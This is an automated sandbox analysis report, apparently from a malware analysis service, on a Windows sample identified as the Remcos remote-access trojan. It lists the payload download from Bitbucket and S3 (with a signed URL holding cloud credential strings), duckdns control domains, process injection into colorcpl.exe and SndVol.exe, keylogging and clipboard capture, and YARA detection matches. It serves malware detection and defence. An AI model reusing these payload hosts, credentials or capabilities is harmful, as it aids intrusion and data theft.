Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027C4B96 WaitForSingleObject,SetEvent,recv,

8_2_027C4B96

Source: global traffic	HTTP traffic detected: GET /ntim1478/gpmaw/downloads/250_Vjrsafyhidj HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/0d838bb6-e11a-4581-89b6-9d1c81b740c6/250_Vjrsafyhidj?response-content-disposition=attachment%3B%20filename%3D%22250_Vjrsafyhidj%22&AWSAccessKeyId=ASIA6KOSE3BNJVZFSC5J&Signature=X9FPDBgOKbMRRHwdgtMpXClEkas%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEID%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQDBsGro9ewLlxm1Jmlfi5RtGFKUidgU0v40nryUex%2FcIgIgI%2BrBcW%2F3yv43XRHYbOxWMP4rmh1qdoHeaiYCvGtj%2BUAqpwIIKBAAGgw5ODQ1MjUxMDExNDYiDKhoBvZz8dz3MdHLcyqEAqNX5Lbiey9VA4Nu2PKLpWe7AzQs30CYCQ17ojsFQBzWb9jeoj1R2lBiZuhmaGwyKFMZacVqoVxGu%2FNGxYiE5WD0T5%2FhYQC8Yx%2BpuwlCMYrdpZyr8LRd1Dspqx%2BDUimzDabcJHysCSHaxuL9Vias0chfJAV6mJYRKWIHNuFasT2CBnFQ1EmYqd%2FFNkaneV9mppb%2BaZ1xRVY6%2Bqv%2BcxJDSZrxDbYwJyM91nLC6Db5%2BAE7H9gjoWPlzs1RzlbZ9U6oQcsRra5iAMM5bKNk1DlWdmHiq0awQP3afEwfLFft8xhJw6j3%2Fs2HWvKLkfxj3x89YGzjHxLi0UqjQ3ffKLCPlhujaT27MMHplboGOp0BD9q41D6kLh9F0nVQM4xyf7fNq9CF0Ik0oCST0SE%2FeyLSoPqdarJpvPrLFVvqTmHs9Xrrnsn0b%2FWvuVqJdzvwFoysrGnC2guwi1wRx%2BRKdh6HIIzmhk1zI5aGT2YQWpP6qaOwQTzLKadxNdAhW0xo3LTCGGxx3cNyux56ve0aK891sK6sUoIojqjLnr9e3jrEAHd%2FC8rvFymkN3%2BxUg%3D%3D&Expires=1732606921 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbuseruploads.s3.amazonaws.com

Source: global traffic	DNS traffic detected: DNS query: bitbucket.org
Source: global traffic	DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: global traffic	DNS traffic detected: DNS query: idearo24.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: morewins.duckdns.org

Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: colorcpl.exe, SndVol.exe	String found in binary or memory: http://geoplugin.net/json.gp
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2170737614.000000007EAA0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2150744964.0000000002A47000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: D2pQ4J4GGZ.exe, D2pQ4J4GGZ.exe, 00000000.00000002.2175474410.000000007FC4F000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2149724742.00000000024CA000.00000004.00000020.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2150540153.00000000029EE000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2032389922.000000007FB1F000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2032127390.00000000024C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.pmail.com
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com/
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2130559625.00000000007E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/0d838bb6-e11a-
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/g9g
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443/e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/0d838bb6-e
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.000000000076D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.00000000207AD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/ntim1478/gpmaw/dow
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020717000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.000000000071E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/ntim1478/gpmaw/downloads/250_Vjrsafyhidj
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.000000000071E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/ntim1478/gpmaw/downloads/250_Vjrsafyhidjp
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cookielaw.org/
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.5.29.78:443 -> 192.168.2.5:49706 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027CA2F3 SetWindowsHookExA 0000000D,027CA2DF,00000000

8_2_027CA2F3

Contains functionality for read data from the clipboard

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027CB749 OpenClipboard,GetClipboardData,CloseClipboard,

8_2_027CB749

Contains functionality to modify clipboard data

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027D68FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	8_2_027D68FC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027D68FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	11_2_027D68FC
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_028168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	13_2_028168FC

Contains functionality to read the clipboard data

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027CB749 OpenClipboard,GetClipboardData,CloseClipboard,

8_2_027CB749

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027CA41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,

8_2_027CA41B

Yara detected Keylogger Generic

Source: Yara match	File source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2170737614.000000007EAA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2150744964.0000000002A47000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: D2pQ4J4GGZ.exe PID: 6804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 5804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 2964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 6608, type: MEMORYSTR

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2349013309.000000001B1D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2170737614.000000007EAA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4491250282.0000000000540000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2150744964.0000000002A47000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2240779632.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4491250282.0000000000528000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: D2pQ4J4GGZ.exe PID: 6804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 5804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 2964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 6608, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027DCA73 SystemParametersInfoW,	8_2_027DCA73
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027DCA73 SystemParametersInfoW,	11_2_027DCA73
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0281CA73 SystemParametersInfoW,	13_2_0281CA73

System Summary

Malicious sample detected (through community Yara rule)

Source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.2170737614.000000007EAA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.2150744964.0000000002A47000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: D2pQ4J4GGZ.exe PID: 6804, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: colorcpl.exe PID: 5804, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: colorcpl.exe PID: 2964, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: SndVol.exe PID: 6608, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Contains functionality to call native functions

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029D8730 NtQueueApcThread,	0_2_029D8730
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029D7A2C NtAllocateVirtualMemory,	0_2_029D7A2C
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029DDC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	0_2_029DDC8C
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029DDC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_029DDC04
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029D7D78 NtWriteVirtualMemory,	0_2_029D7D78
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029DDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	0_2_029DDD70
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029D8D70 GetThreadContext,SetThreadContext,NtResumeThread,	0_2_029D8D70
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029D8D6E GetThreadContext,SetThreadContext,NtResumeThread,	0_2_029D8D6E
